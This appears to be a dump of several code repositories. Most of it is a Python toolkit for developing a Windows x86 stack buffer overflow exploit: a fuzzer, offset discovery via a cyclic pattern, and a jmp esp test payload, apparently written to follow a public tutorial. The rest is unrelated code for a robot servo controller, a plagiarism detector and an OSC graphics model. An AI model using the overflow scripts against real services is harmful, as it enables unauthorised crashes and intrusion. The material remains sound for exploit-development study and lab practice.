yokel72/bof | refs/heads/master | #!/usr/bin/env python
import socket, argparse
parser = argparse.ArgumentParser()
parser.add_argument("RHOST", help="Remote host IP")
parser.add_argument("RPORT", help="Remote host port", type=int)
parser.add_argument("-l", help="Max buffer length in bytes; default 1024", type=int, default=1024, dest='buf_len')
args = parser.parse_args()
buf = "A" * args.buf_len + "\n"
print buf
print "Attempting to connect to service..."
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((args.RHOST, args.RPORT))
print "Sending %s A's..." % args.buf_len
s.send(buf)
print "%s A's sent." % args.buf_len
except:
print "Error connecting to service..."
| Python | 29 | 23.482759 | 114 | /1_trigger_bug.py | 0.673239 | 0.660563 |
yokel72/bof | refs/heads/master | # Functions supporting a Windows x86 reverse shell stack buffer overflow
# Saved Return Pointer overwrite exploit.
# Parameters are saved in params.py for persistence.
# Delete params.py and params.pyc to reset them; or simply edit params.py
#
# Written by y0k3L
# Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
# https://github.com/justinsteven/dostackbufferoverflowgood
import socket, struct
# import params from params.py; or create an empty file if not exists
try:
import params
except:
open('params.py', 'a').close()
print "params.py created for parameter persistence."
# write parameter to file for persistence
def writeParamToFile(param_name, param_value):
with open("params.py", "a") as f:
f.write("%s = %s\n" % (param_name, param_value))
# return remote host (target) IP address
def getRhost():
try:
return params.RHOST
except:
RHOST = raw_input("RHOST: ")
writeParamToFile("RHOST", '\"' + RHOST + '\"')
return RHOST
# return remote host (target) port
def getRport():
try:
return params.RPORT
except:
RPORT = raw_input("RPORT: ")
writeParamToFile("RPORT", RPORT)
return int(RPORT)
# return local host (listening) IP address
def getLhost():
try:
return params.LHOST
except:
LHOST = raw_input("LHOST: ")
writeParamToFile("LHOST", '\"' + LHOST + '\"')
return LHOST
# return local host (listening) port
def getLport():
try:
return params.LPORT
except:
LPORT = raw_input("LPORT: ")
writeParamToFile("LPORT", LPORT)
return int(LPORT)
# return max buffer length
def getBufTotlen():
try:
return params.buf_totlen
except:
buf_totlen = raw_input("Max buffer length: ")
writeParamToFile("buf_totlen", buf_totlen)
return int(buf_totlen)
# return Saved Return Pointer offset
def getOffsetSrp():
try:
return params.offset_srp
except:
offset_srp = raw_input("offset_srp: ")
writeParamToFile("offset_srp", offset_srp)
return int(offset_srp)
# return pointer address to jmp esp
def getPtrJmpEsp():
try:
return params.ptr_jmp_esp
except:
ptr_jmp_esp = raw_input("ptr_jmp_esp: ")
writeParamToFile("ptr_jmp_esp", ptr_jmp_esp)
return int(ptr_jmp_esp, 16)
# return bad characters
def getBadChars():
try:
# return [hex(x) for x in params.badchars]
return params.badchars
except:
input = raw_input("Enter bad characters in hex format, no spaces, eg. 0x0A,0x7B: ")
input = input.split(",") # split out by comma delimeter
badchars = []
for i in range(0, len(input)):
input[i] = int(input[i], 16) # convert from str to hex int
badchars.append(input[i]) # append bad char to badchars list
# remove any duplicates
badchars = list(dict.fromkeys(badchars))
# writeParamToFile("badchars", '\"' + badchars + '\"')
writeParamToFile("badchars", badchars)
return badchars
# connect to remote host (target) and send buffer
# return 0 for success; return 1 for failure
def sendBuffer(RHOST, RPORT, buf):
print "Attempting to connect to service..."
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((RHOST, RPORT))
print "Sending buffer..."
# this part may need to be modified depending on which command is vulnerable in the target service
s.send(buf)
s.close()
print "Buffer sent."
return 0
except:
print "Error connecting to service..."
return 1
# return unique pattern of desired length
def pattern_create(length):
pattern = ''
parts = ['A', 'a', '0']
while len(pattern) != length:
pattern += parts[len(pattern) % 3]
if len(pattern) % 3 == 0:
parts[2] = chr(ord(parts[2]) + 1)
if parts[2] > '9':
parts[2] = '0'
parts[1] = chr(ord(parts[1]) + 1)
if parts[1] > 'z':
parts[1] = 'a'
parts[0] = chr(ord(parts[0]) + 1)
if parts[0] > 'Z':
parts[0] = 'A'
return pattern
# return pattern offset given a unique pattern and value to search for
def pattern_offset(value, pattern):
value = struct.pack('<I', int(value, 16)).strip('\x00')
print "value =", value
try:
return pattern.index(value)
except ValueError:
print "Pattern not found..."
return "Not found"
| Python | 159 | 28.27673 | 106 | /functions.py | 0.602363 | 0.593126 |
yokel72/bof | refs/heads/master | #!/usr/bin/env python
# Generates and sends a unique pattern to a service as part of the process in
# developing a Windows x86 reverse shell stack buffer overflow
# Saved Return Pointer overwrite exploit.
# Parameters are saved in params.py for persistence.
# Delete params.py and params.pyc to reset them; or simply edit params.py
#
# Written by y0k3L
# Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
# https://github.com/justinsteven/dostackbufferoverflowgood
import functions
# get parameters
RHOST = functions.getRhost()
RPORT = functions.getRport()
buf_totlen = functions.getBufTotlen()
print "RHOST=%s; RPORT=%s; buf_totlen=%s" % (RHOST, RPORT, buf_totlen)
pattern = functions.pattern_create(buf_totlen)
pattern += '\n'
print pattern
sent = functions.sendBuffer(RHOST, RPORT, pattern)
if sent is 0:
print "EIP should now be overwritten."
eip_value = raw_input("EIP value: ")
offset_srp = functions.pattern_offset(eip_value, pattern)
print "offset_srp =", offset_srp
if "offset_srp" in open("params.py", "r").read() and offset_srp != functions.getOffsetSrp():
print "Something went wrong...offset_srp is already defined in params.py as %s" % functions.getOffsetSrp()
elif isinstance(offset_srp, int):
functions.writeParamToFile("offset_srp", offset_srp)
else:
print "Error: offset could not be found."
| Python | 38 | 35.342106 | 114 | /2_discover_offset.py | 0.727009 | 0.723389 |
yokel72/bof | refs/heads/master | #!/usr/bin/env python
# Uses a software interrupt to test the jmp esp functionality as part of the
# process in developing a Windows x86 reverse shell stack buffer overflow
# Saved Return Pointer overwrite exploit.
# Parameters are saved in params.py for persistence.
# Delete params.py and params.pyc to reset them; or simply edit params.py
#
# Written by y0k3L
# Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
# https://github.com/justinsteven/dostackbufferoverflowgood
import struct, functions
# get parameters
RHOST = functions.getRhost()
RPORT = functions.getRport()
buf_totlen = functions.getBufTotlen()
offset_srp = functions.getOffsetSrp()
ptr_jmp_esp = functions.getPtrJmpEsp()
print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s; ptr_jmp_esp=%s" % (RHOST, RPORT, buf_totlen, offset_srp, hex(ptr_jmp_esp))
buf = ""
buf += "A" * (offset_srp - len(buf)) # padding
buf += struct.pack("<I", ptr_jmp_esp) # SRP overwrite. Converts to little endian
buf += "\xCC\xCC\xCC\xCC" # ESP points here
buf += "D" * (buf_totlen - len(buf)) # trailing padding
buf += "\n"
# print buf
sent = functions.sendBuffer(RHOST, RPORT, buf)
if sent is 0:
print "Caught software interrupt?"
| Python | 36 | 33.027779 | 131 | /5_jmp_esp_interrupt.py | 0.713469 | 0.709388 |
yokel72/bof | refs/heads/master | #!/usr/bin/env python
import socket, argparse, time
parser = argparse.ArgumentParser()
parser.add_argument("RHOST", help="Remote host IP")
parser.add_argument("RPORT", help="Remote host port", type=int)
parser.add_argument("-l", help="Max number of bytes to send; default 1000", type=int, default=1000, dest='max_num_bytes')
args = parser.parse_args()
for i in range(100, args.max_num_bytes+1, 100):
buf = "A" * i
print "Fuzzing service with %s bytes" % i
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((args.RHOST, args.RPORT))
s.send(buf + '\n')
s.recv(1024)
s.close()
time.sleep(0.5)
except:
print "Error connecting to service..."
if len(buf) > 100:
print "Crash occurred with buffer length: " + str(len(buf))
exit()
| Python | 31 | 27.193548 | 121 | /fuzzer.py | 0.614416 | 0.585812 |
yokel72/bof | refs/heads/master | #!/usr/bin/env python
# Used to confirm that the suspected offset is indeed correct. This is part of
# the process in developing a Windows x86 reverse shell stack buffer overflow
# Saved Return Pointer overwrite exploit.
# Parameters are saved in params.py for persistence.
# Delete params.py and params.pyc to reset them; or simply edit params.py
#
# Written by y0k3L
# Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
# https://github.com/justinsteven/dostackbufferoverflowgood
import functions, os
# get parameters
RHOST = functions.getRhost()
RPORT = functions.getRport()
buf_totlen = functions.getBufTotlen()
offset_srp = functions.getOffsetSrp()
if offset_srp > buf_totlen-300:
print "Warning: offset is close to max buffer length. Recommend increasing "
print "max buffer length (buf_totlen)"
print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s" % (RHOST, RPORT, buf_totlen, offset_srp)
buf = ""
buf += "A" * (offset_srp - len(buf)) # padding
buf += "BBBB" # SRP overwrite
buf += "CCCC" # ESP should end up pointing here
buf += "D" * (buf_totlen - len(buf)) # trailing padding
buf += "\n"
# print buf
sent = functions.sendBuffer(RHOST, RPORT, buf)
if sent is 0:
print "Confirm that EBP is all 0x41's, EIP is all 0x42's, and ESP points "
print "to four 0x43's followed by many 0x44's"
| Python | 40 | 33.775002 | 97 | /3_confirm_offset.py | 0.692308 | 0.67793 |
qfolkner/RDL-Robot-Code | refs/heads/master | from __future__ import division
import time
import pygame
from adafruit_servokit import ServoKit
pygame.init()
pwm = ServoKit(channels=16)
leftstick = 0.07
rightstick = 0.07
liftUP = 0.00
liftDOWN = 0.00
print('Initialized')
gamepad = pygame.joystick.Joystick(0)
gamepad.init()
while True:
pygame.event.get()
if abs(gamepad.get_axis(1)) <= 0.1:
leftstick = 0.1
elif abs(gamepad.get_axis(4)) <= 0.1:
rightstick = 0.1
elif abs(gamepad.get_button(3)) <= 0.1:
liftUP = 0.1
elif abs(gamepad.get_button(0)) <= 0.1:
liftDOWN = 0.1
leftstick = gamepad.get_axis(1)
rightstick = gamepad.get_axis(4)
liftUP = gamepad.get_button(3)
liftDOWN = -gamepad.get_button(0)
pwm.continuous_servo[1].throttle = leftstick
pwm.continuous_servo[4].throttle = rightstick
pwm.continuous_servo[11].throttle = liftUP
pwm.continuous_servo[11].throttle = liftDOWN
print("rightstick: ", rightstick)
print("leftstick: ", leftstick)
print("lift: ", liftUP)
print("lift: ", liftDOWN)
#axis 0 = A
#axis 3 = Y | Python | 58 | 19.241379 | 49 | /servoGOOD.py | 0.602728 | 0.56266 |
FazilovDev/GraduateWork | refs/heads/main | from Algorithms.Winnowing import get_fingerprints, get_text_from_file
from tkinter import *
from tkinter import filedialog as fd
import locale
k = 15
q = 259#259
w = 4
class PlagiarismDetect(Frame):
def __init__(self, parent):
Frame.__init__(self, parent, background="white")
self.parent = parent
self.width = self.winfo_screenwidth()
self.height = self.winfo_screenheight()
self.parent.title("DetectPlagiarismMoss")
self.pack(fill=BOTH, expand=True)
self.file1 = 'file1'
self.file2 = 'file2'
self.create_main_menu()
def choice_f1(self):
self.file1 = fd.askopenfilename(defaultextension='.cpp', filetypes=[('CPP', '.cpp'),('TXT', '.txt'), ('Py', '.py')])
self.text_info_menu['text'] = "Загрузите\n {}\n {}:".format(self.file1, self.file2)
def choice_f2(self):
self.file2 = fd.askopenfilename(defaultextension='.cpp', filetypes=[('CPP', '.cpp'),('TXT', '.txt'),('Py', '.py')])
self.text_info_menu['text'] = "Загрузите\n {}\n {}:".format(self.file1, self.file2)
def print_file1(self,text, points, side):
newCode = text[: points[0][0]]
if side == 0:
textfield = self.text1
else:
textfield = self.text2
textfield.insert('end', newCode)
plagCount = 0
for i in range(len(points)):
if points[i][1] > points[i][0]:
plagCount += points[i][1] - points[i][0]
newCode = newCode + text[points[i][0] : points[i][1]]
textfield.insert('end', text[points[i][0] : points[i][1]], 'warning')
if i < len(points) - 1:
newCode = newCode + text[points[i][1] : points[i+1][0]]
textfield.insert('end', text[points[i][1] : points[i+1][0]])
else:
newCode = newCode + text[points[i][1] :]
textfield.insert('end', text[points[i][1] :])
return plagCount / len(text)
def analyze(self):
self.text1.tag_config('warning', background="orange",)
self.text2.tag_config('warning', background="orange")
text1 = get_text_from_file(self.file1)
text2 = get_text_from_file(self.file2)
mergedPoints = get_fingerprints(self.file1, self.file2, k, q, w)
res = self.print_file1(text1, mergedPoints[0], 0)
res1 = self.print_file1(text2, mergedPoints[1], 1)
self.text_plagiarism['text'] = "Уникальность файла: {} : {}%\nУникальность файла: {} : {}%".format(self.file1.split('/')[-1::][0], int((1-res)*100), self.file2.split('/')[-1::][0], int((1-res1)*100))
def create_main_menu(self):
frame1 = Frame(self)
frame1.pack(fill=X)
frame1.config(bg="white")
self.text_info_menu = Label(frame1, text="Загрузите \n{} \n{}:".format(self.file1, self.file2), font=("Arial Bold", 20))
self.text_info_menu.config(bg="white")
self.text_info_menu.pack()
self.text_plagiarism = Label(frame1, text="Уникальность файла: {} : {}%\nУникальность файла: {} : {}%".format("",0, "", 0), font=("Arial Bold", 20))
self.text_plagiarism.config(bg="white")
self.text_plagiarism.pack()
choice_file2 = Button(frame1, text="Файл №2", command=self.choice_f2)
choice_file2.pack(side=RIGHT, expand=True)
choice_file1 = Button(frame1, text="Файл №1", command=self.choice_f1)
choice_file1.pack(side=RIGHT, expand=True)
frame2 = Frame(self)
frame2.pack(fill=X)
frame2.config(bg="white")
analyze = Button(frame2, text="Обработать", command=self.analyze)
analyze.pack()
frame3 = Frame(self)
frame3.pack(fill=X)
frame3.config(bg="white")
self.text1 = Text(frame3, width=int(100), height=int(100))
self.text1.pack(side=LEFT)
self.text2 = Text(frame3, width=int(100), height=int(100))
self.text2.pack(side=LEFT)
def main():
locale.setlocale(locale.LC_ALL, 'ru_RU.UTF8')
root = Tk()
root.geometry("{}x{}".format(root.winfo_screenwidth(), root.winfo_screenheight()))
app = PlagiarismDetect(root)
root.mainloop()
if __name__ == '__main__':
main() | Python | 110 | 37.854546 | 207 | /main.py | 0.575942 | 0.546454 |
FazilovDev/GraduateWork | refs/heads/main | from Preprocessing.cleantext import *
class Gram:
def __init__(self, text, hash_gram, start_pos, end_pos):
self.text = text
self.hash = hash_gram
self.start_pos = start_pos
self.end_pos = end_pos
def get_text_from_file(filename):
with open(filename, 'r') as f:
text = f.read().lower()
return text
def get_text_processing(text):
stop_symbols = [' ', ',']
return ''.join(j for j in text if not j in stop_symbols)
def get_hash_from_gram(gram, q):
h = 0
k = len(gram)
for char in gram:
x = int(ord(char)-ord('a') + 1)
h = (h * k + x) % q
return h
def get_k_grams_from_text(text, k = 25, q = 31):
grams = []
for i in range(0, len(text)-k+1):
hash_gram = get_hash_from_gram(text[i:i+k], q)
gram = Gram(text[i:i+k], hash_gram, i, i+k)
grams.append(gram)
return grams
def get_hashes_from_grams(grams):
hashes = []
for gram in grams:
hashes.append(gram.hash)
return hashes
def min_index(window):
min_ = window[0]
min_i = 0
for i in range(len(window)):
if window[i] < min_:
min_ = window[i]
min_i = i
return min_i
def winnow(hashes, w):
n = len(hashes)
prints = []
windows = []
prev_min = 0
current_min = 0
for i in range(n - w):
window = hashes[i:i+w]
windows.append(window)
current_min = i + min_index(window)
if not current_min == prev_min:
prints.append(hashes[current_min])
prev_min = current_min
return prints
def get_points(fp1, fp2, token, hashes, grams):
points = []
for i in fp1:
for j in fp2:
if i == j:
flag = 0
startx = endx = None
match = hashes.index(i)
newStart = grams[match].start_pos
newEnd = grams[match].end_pos
for k in token:
if k[2] == newStart:
startx = k[1]
flag = 1
if k[2] == newEnd:
endx = k[1]
if flag == 1 and endx != None:
points.append([startx, endx])
points.sort(key = lambda x: x[0])
points = points[1:]
return points
def get_merged_points(points):
mergedPoints = []
mergedPoints.append(points[0])
for i in range(1, len(points)):
last = mergedPoints[len(mergedPoints) - 1]
if points[i][0] >= last[0] and points[i][0] <= last[1]:
if points[i][1] > last[1]:
mergedPoints = mergedPoints[: len(mergedPoints)-1]
mergedPoints.append([last[0], points[i][1]])
else:
pass
else:
mergedPoints.append(points[i])
return mergedPoints
def get_fingerprints(file1, file2, k, q, w):
token1 = tokenize(file1)
token2 = tokenize(file2)
text1proc = toText(token1)
text2proc = toText(token2)
grams1 = get_k_grams_from_text(text1proc, k, q)
grams2 = get_k_grams_from_text(text2proc, k, q)
hashes1 = get_hashes_from_grams(grams1)
hashes2 = get_hashes_from_grams(grams2)
fp1 = winnow(hashes1, w)
fp2 = winnow(hashes2, w)
points1 = get_points(fp1, fp2, token1, hashes1, grams1)
points2 = get_points(fp1, fp2, token2, hashes2, grams2)
merged_points1 = get_merged_points(points1)
merged_points2 = get_merged_points(points2)
return (merged_points1, merged_points2)
| Python | 127 | 26.826771 | 66 | /Algorithms/Winnowing.py | 0.53918 | 0.517397 |
sonir/vsyn_model | refs/heads/master | # if you want to use this library from outside of sonilab folder, should import as follows,
# from sonilab import sl_metro, sl_osc_send, osc_receive, event
# enjoy !!
import random
from sonilab import sl_metro, sl_osc_send, osc_receive, event
import shapes, shape, send_all
metro = sl_metro.Metro(0.016)
metro2 = sl_metro.Metro(0.5)
sender = sl_osc_send.slOscSend("127.0.0.1" , 57137)
receiver = osc_receive.OscReceive(57138)
ball_posi_a = 0.1
ball_posi_b = 0.9
ball_speed = 0.5
def osc_received (vals):
print "OSC RECEIVED :: arg[0] = " + str(vals[0]) + " | arg[1] = " + str(vals[1])
def send(adr, vals):
sender.send(adr, vals)
event.add("/test" , osc_received)
event.add("/send" , send)
receiver.setup("/foo")
def init():
global ball_posi_a, ball_posi_b
#Make Primitives
node1 = shape.Shape("/circle" , "node1") #set shape_type tag and unique name
node1.set("x1" , ball_posi_a)
node1.set("y1" , 0.5)
node1.set("size" , 0.005)
node1.set("fill" , 0)
shapes.add(node1.name , node1)
node2 = shape.Shape("/circle" , "node2") #set shape_type tag and unique name
node2.set("x1" , ball_posi_b)
node2.set("y1" , 0.5)
node2.set("size" , 0.005)
node2.set("fill" , 0)
shapes.add(node2.name , node2)
ball = shape.Shape("/circle" , "ball") #set shape_type tag and unique name
ball.set("x1" , ball_posi_a)
ball.set("y1" , 0.5)
ball.set("size" , 0.005)
ball.set("fill" , 1)
shapes.add(ball.name , ball)
arc = shape.Shape("/arc" , "arc") #set shape_type tag and unique name
arc.set("x1" , ball_posi_a)
arc.set("y1" , 0.5)
arc.set("x2" , ball_posi_b)
arc.set("y2" , 0.5)
arc.set("height", 0.3)
shapes.add(arc.name , arc)
wave = shape.Shape("/wave", "wave")
wave.set("x1" , ball_posi_a)
wave.set("y1" , 0.5)
wave.set("x2" , ball_posi_b)
wave.set("y2" , 0.5)
wave.set("height", 0.3)
wave.set("freq" , 4.0)
wave.set("phase", 0.0)
shapes.add(wave.name , wave)
def get_primitive(name):
tmp = shapes.get_primitive(name)
return tmp[1] #<- shapes.get_primitive returns a tupple. It includes the shape_tag(same as osc_address) and the list of parameters.
def move_ball():
print "move_ball"
global ball_posi_a, ball_posi_b, ball_speed
ball = shapes.get("ball")
arc = shapes.get("arc")
wave = shapes.get("wave")
ball_x = ball.get('x1')
print ball_x
if ball_x == ball_posi_a:
print "A"
ball.set("x1" , ball_posi_b, ball_speed)
arc.set("height", 0.3, ball_speed)
wave.set("freq", 7.0, ball_speed)
elif ball_x == ball_posi_b:
print "B"
ball.set("x1" , ball_posi_a, ball_speed)
arc.set("height", -0.3, ball_speed)
wave.set("freq", 2.0, ball_speed)
def draw():
dic = shapes.get_all()
send_all.run(dic)
try :
#INIT all objects
init()
prim = None
#Start Loop
while True:
if metro.update():
draw()
if metro2.update(): #write code to execute every 1 sec
prim = get_primitive("ball")
print "x1 = " , prim[1] , " : y1 = " , prim[2]
if random.randint(0,1) == 1:
move_ball() #move ball with 50 percent rate in each round
except KeyboardInterrupt :
receiver.terminate()
| Python | 125 | 25.808001 | 135 | /_main.py | 0.586691 | 0.549985 |
sonir/vsyn_model | refs/heads/master | import threading
from sonilab import event
import shape
"""
Shapes treats array of shape.
"""
LOCK = threading.Lock()
data = {}
count = 0
def add(name, obj):
global LOCK , count
with LOCK:
data[name]=(count , obj)
count += 1
def get_primitive(name):
tuple_uid_and_obj = data[name]
uid = tuple_uid_and_obj[0]
obj = tuple_uid_and_obj[1]
tuple_address_and_params = obj.get_primitive()
adr = tuple_address_and_params[0]
params = tuple_address_and_params[1]
params.insert(0, uid)
return (adr,params)
def get_all():
container = []
for elm in data:
tmp = data[elm]
container.append( get_primitive(tmp[1].name) )
return container
def get(name):
tuple_uid_and_obj = data[name]
return tuple_uid_and_obj[1]
def set(name, variable, *args):
if args:
tuple_uid_and_obj = data[name]
obj = tuple_uid_and_obj[1]
obj.set(variable, *args)
def print_all():
print "--- [shapes : print_all() ] ---"
for elm in data:
tmp = data[elm]
obj = tmp[1]
tmp = obj.get_primitive()
params = tmp[1]
print elm , obj
for param in params:
print param ,
print "\n--"
print "--- [print_all() : end] ---"
| Python | 70 | 17.371429 | 54 | /shapes.py | 0.565555 | 0.556245 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.